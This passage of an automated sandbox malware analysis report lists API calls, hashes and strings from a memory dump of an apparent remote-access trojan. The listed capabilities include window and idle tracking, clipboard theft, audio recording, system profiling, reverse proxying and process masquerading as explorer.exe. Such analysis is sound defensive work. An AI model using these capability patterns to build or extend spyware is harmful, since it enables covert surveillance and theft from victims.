                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                      • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                      • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                      • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                      • GetLastError.KERNEL32 ref: 00455CEF
                                      • __dosmaperr.LIBCMT ref: 00455CF6
                                      • GetFileType.KERNEL32(00000000), ref: 00455D02
                                      • GetLastError.KERNEL32 ref: 00455D0C
                                      • __dosmaperr.LIBCMT ref: 00455D15
                                      • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                      • CloseHandle.KERNEL32(?), ref: 00455E7F
                                      • GetLastError.KERNEL32 ref: 00455EB1
                                      • __dosmaperr.LIBCMT ref: 00455EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                      • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                      • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                      • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                      • __alloca_probe_16.LIBCMT ref: 00453EEA
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                      • __alloca_probe_16.LIBCMT ref: 00453F94
                                      • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                      • __freea.LIBCMT ref: 00454003
                                      • __freea.LIBCMT ref: 0045400F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID: \@E
                                      • API String ID: 201697637-1814623452
                                      • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                      • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                      • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                      • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                      • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                      • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                      • __freea.LIBCMT ref: 0044AE30
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • __freea.LIBCMT ref: 0044AE39
                                      • __freea.LIBCMT ref: 0044AE5E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID: $C$PkGNG
                                      • API String ID: 3864826663-3740547665
                                      • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                      • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                      • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                      • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: \&G$\&G$`&G
                                      • API String ID: 269201875-253610517
                                      • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                      • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                      • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                      • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                      • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                      • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                      • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0040AD38
                                      • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                      • GetForegroundWindow.USER32 ref: 0040AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                      • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                      • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                      • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                      • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                      • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                      • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                      • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                      • __dosmaperr.LIBCMT ref: 0043A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                      • __dosmaperr.LIBCMT ref: 0043A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                      • __dosmaperr.LIBCMT ref: 0043A937
                                      • _free.LIBCMT ref: 0043A943
                                      • _free.LIBCMT ref: 0043A94A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                      • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                      • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                      • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                      • TranslateMessage.USER32(?), ref: 0040557E
                                      • DispatchMessageA.USER32(?), ref: 00405589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                      • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                      • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                      • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: 0VG$0VG$<$@$Temp
                                      • API String ID: 1704390241-2575729100
                                      • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                      • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                      • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                      • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenClipboard.USER32 ref: 00416941
                                      • EmptyClipboard.USER32 ref: 0041694F
                                      • CloseClipboard.USER32 ref: 00416955
                                      • OpenClipboard.USER32 ref: 0041695C
                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                      • CloseClipboard.USER32 ref: 00416984
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID: !D@
                                      • API String ID: 2172192267-604454484
                                      • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                      • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                      • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                      • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                      • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                      • CloseHandle.KERNEL32(?), ref: 00413465
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                      • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                      • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                      • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                      • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                      • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                      • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00448135
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00448141
                                      • _free.LIBCMT ref: 0044814C
                                      • _free.LIBCMT ref: 00448157
                                      • _free.LIBCMT ref: 00448162
                                      • _free.LIBCMT ref: 0044816D
                                      • _free.LIBCMT ref: 00448178
                                      • _free.LIBCMT ref: 00448183
                                      • _free.LIBCMT ref: 0044818E
                                      • _free.LIBCMT ref: 0044819C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                      • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                      • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                      • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                      • API String ID: 3578746661-3604713145
                                      • Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                      • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                      • Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                      • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                      • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                      • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                      • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                      • __fassign.LIBCMT ref: 0044B479
                                      • __fassign.LIBCMT ref: 0044B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID: PkGNG
                                      • API String ID: 1324828854-263838557
                                      • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                      • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                      • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                      • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • Sleep.KERNEL32(00000064), ref: 00417521
                                      • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                      • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                      • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                      • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\NvbYSEq.exe), ref: 0040749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                      • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                      • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                      • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _strftime.LIBCMT ref: 00401D50
                                        • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                      • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                      Strings
